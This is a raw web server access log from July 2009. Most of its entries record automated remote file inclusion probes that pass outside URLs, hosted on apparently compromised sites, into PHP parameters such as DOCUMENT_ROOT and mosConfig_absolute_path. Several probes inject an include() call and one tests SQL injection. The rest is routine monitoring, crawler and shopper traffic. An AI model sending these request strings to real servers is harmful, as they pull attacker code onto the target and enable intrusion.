121.78.129.7 - - [26/Jul/2009:02:44:46 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:02:44:46 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:02:44:46 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:02:45:24 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
91.149.157.130 - - [26/Jul/2009:02:45:34 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.149.157.130 - - [26/Jul/2009:02:45:34 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
91.149.157.130 - - [26/Jul/2009:02:45:34 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.59.12.99 - - [26/Jul/2009:02:45:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [26/Jul/2009:02:45:41 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.246.20.221 - - [26/Jul/2009:02:45:41 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.246.20.221 - - [26/Jul/2009:02:45:41 -0400] "GET /logs/access_log.Q109051700//bbs//skin/ggambo7002_board/write.php?dir=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:02:45:54 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
121.78.129.7 - - [26/Jul/2009:02:46:00 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:02:46:00 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:02:46:00 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:02:46:14 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:02:46:14 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:02:46:18 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:02:46:25 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
91.149.157.130 - - [26/Jul/2009:02:46:25 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
63.147.72.145 - - [26/Jul/2009:02:46:26 -0400] "GET /logs/access_log.Q109051600%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:46:34 -0400] "GET /logs/access_log.Q109070800%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:46:50 -0400] "GET /logs/access_log.Q109051600%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
63.147.72.145 - - [26/Jul/2009:02:47:01 -0400] "GET /logs/access_log.Q109070800%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://edulococrew.kit.net/faq01.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:02:47:11 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.246.20.221 - - [26/Jul/2009:02:48:41 -0400] "GET /logs/access_log.Q109051700%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.ucsda.org/images/1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:02:49:05 -0400] "GET /logs/access_log.Q109052100//?_zb_path=http://www.youclinic.com/bbs/copyright.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:02:49:05 -0400] "GET /logs//?_zb_path=http://www.youclinic.com/bbs/copyright.txt? HTTP/1.1" 200 11071 "-" "Mozilla/5.0"
91.149.157.130 - - [26/Jul/2009:02:49:22 -0400] "GET /logs/error_log.Q109052100//?_zb_path=http://www.youclinic.com/bbs/copyright.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:02:49:25 -0400] "GET /images/_notes/nav04_download_off.jpg.mno HTTP/1.1" 200 259 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [26/Jul/2009:02:50:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.20.186.139 - - [26/Jul/2009:02:53:31 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:53:31 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:53:31 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:53:32 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:53:51 -0400] "GET /logs/access_log.Q109063000%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:54:30 -0400] "GET //?path%5Bdocroot%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:54:30 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 200 11071 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:54:30 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:54:31 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
89.97.206.137 - - [26/Jul/2009:02:54:33 -0400] "GET /logs/access_log.Q109060100%20/index.php?page=http://www.nopaste.pl/Source/e1e.txt?&mode=id HTTP/1.1" 404 235 "-" "-"
89.97.206.137 - - [26/Jul/2009:02:54:35 -0400] "GET /index.php?page=http://www.nopaste.pl/Source/e1e.txt?&mode=id HTTP/1.1" 404 207 "-" "-"
89.97.206.137 - - [26/Jul/2009:02:54:35 -0400] "GET /logs/index.php?page=http://www.nopaste.pl/Source/e1e.txt?&mode=id HTTP/1.1" 404 212 "-" "-"
87.20.186.139 - - [26/Jul/2009:02:55:21 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:02:55:22 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:02:55:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [26/Jul/2009:02:55:59 -0400] "GET /images/_notes/banner_connect_over.jpg.mno HTTP/1.1" 200 255 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.29.159.130 - - [26/Jul/2009:02:57:59 -0400] "GET //?_zb_path=http://www.thelegalnews.com/nav/r57/test.txt?? HTTP/1.1" 200 452 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
217.29.159.130 - - [26/Jul/2009:02:58:00 -0400] "GET /logs//?_zb_path=http://www.thelegalnews.com/nav/r57/test.txt?? HTTP/1.1" 200 11071 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
87.20.186.139 - - [26/Jul/2009:02:58:15 -0400] "GET /logs/access_log.Q109060100%20%20/errors.php?error=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [26/Jul/2009:02:58:30 -0400] "GET /logs/access_log.Q109052800%20%20//include/bbs.lib.inc.php?site_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
201.232.54.48 - - [26/Jul/2009:02:58:48 -0400] "GET /logs/access_log.Q109070200%20%20//include/bbs.lib.inc.php?site_path=http://dwno.or.kr/bbs/data/swat/tes.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.68.247 - - [26/Jul/2009:02:59:39 -0400] "GET /images/0034211_thumb.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
87.106.101.144 - - [26/Jul/2009:02:59:55 -0400] "GET /phpshop/index.php?base_dir=' HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
87.106.101.144 - - [26/Jul/2009:03:00:12 -0400] "GET /logs/access_log.Q109052200/phpshop/index.php?base_dir=' HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
87.106.101.144 - - [26/Jul/2009:03:00:13 -0400] "GET /phpshop/index.php?base_dir=' HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
87.106.101.144 - - [26/Jul/2009:03:00:13 -0400] "GET /logs/phpshop/index.php?base_dir=' HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
209.59.12.99 - - [26/Jul/2009:03:00:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.15.177.55 - - [26/Jul/2009:03:00:52 -0400] "GET /logs/errors.php?error=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.15.177.55 - - [26/Jul/2009:03:00:52 -0400] "GET /errors.php?error=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.15.177.55 - - [26/Jul/2009:03:00:52 -0400] "GET /logs/access_log.Q109070900/errors.php?error=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
87.106.101.144 - - [26/Jul/2009:03:01:31 -0400] "GET /logs/error_log.Q109052200/phpshop/index.php?base_dir=' HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
66.249.68.247 - - [26/Jul/2009:03:02:33 -0400] "GET /images/_notes/home_welcome_bkgrd3.gif.mno HTTP/1.1" 200 249 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
67.15.177.55 - - [26/Jul/2009:03:03:25 -0400] "GET /logs/access_log.Q109070900%20%20/errors.php?error=http://youthwonju.com/bbs/x1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:03:33 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:03:03:37 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
89.234.7.92 - - [26/Jul/2009:03:03:37 -0400] "GET //galeria.php?start=0&kategoria=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
89.234.7.92 - - [26/Jul/2009:03:03:38 -0400] "GET /logs//galeria.php?start=0&kategoria=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.38.243.71 - - [26/Jul/2009:03:03:45 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:03:45 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:03:45 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
89.234.7.92 - - [26/Jul/2009:03:03:47 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://inamsan.kg.kr/emt/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
218.38.243.71 - - [26/Jul/2009:03:03:53 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:03:54 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:03:59 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:03:59 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:03:59 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
87.20.186.139 - - [26/Jul/2009:03:04:15 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:04:52 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.243.71 - - [26/Jul/2009:03:04:53 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://aboutav.com/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [26/Jul/2009:03:05:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.129.7 - - [26/Jul/2009:03:05:49 -0400] "GET /logs/access_log.Q109060600/port.php?content=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:03:05:49 -0400] "GET /port.php?content=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:03:05:49 -0400] "GET /logs/port.php?content=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
121.78.129.7 - - [26/Jul/2009:03:05:55 -0400] "GET /logs/access_log.Q109051200/port.php?content=http://hongju.es.kr/bbs/images/sub/ziv.gif?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
93.172.129.118 - - [26/Jul/2009:03:06:05 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video HTTP/1.1" 200 38015 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:07 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:07 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:08 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:08 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:09 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:09 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:09 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:10 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:10 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:10 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:11 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:11 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:11 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:12 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:12 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:12 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:13 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
93.172.129.118 - - [26/Jul/2009:03:06:13 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):video" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; SIMBAR={3B6FC3A0-84E1-45BE-AD5D-DDF9BE187111}; .NET CLR 2.0.50727)"
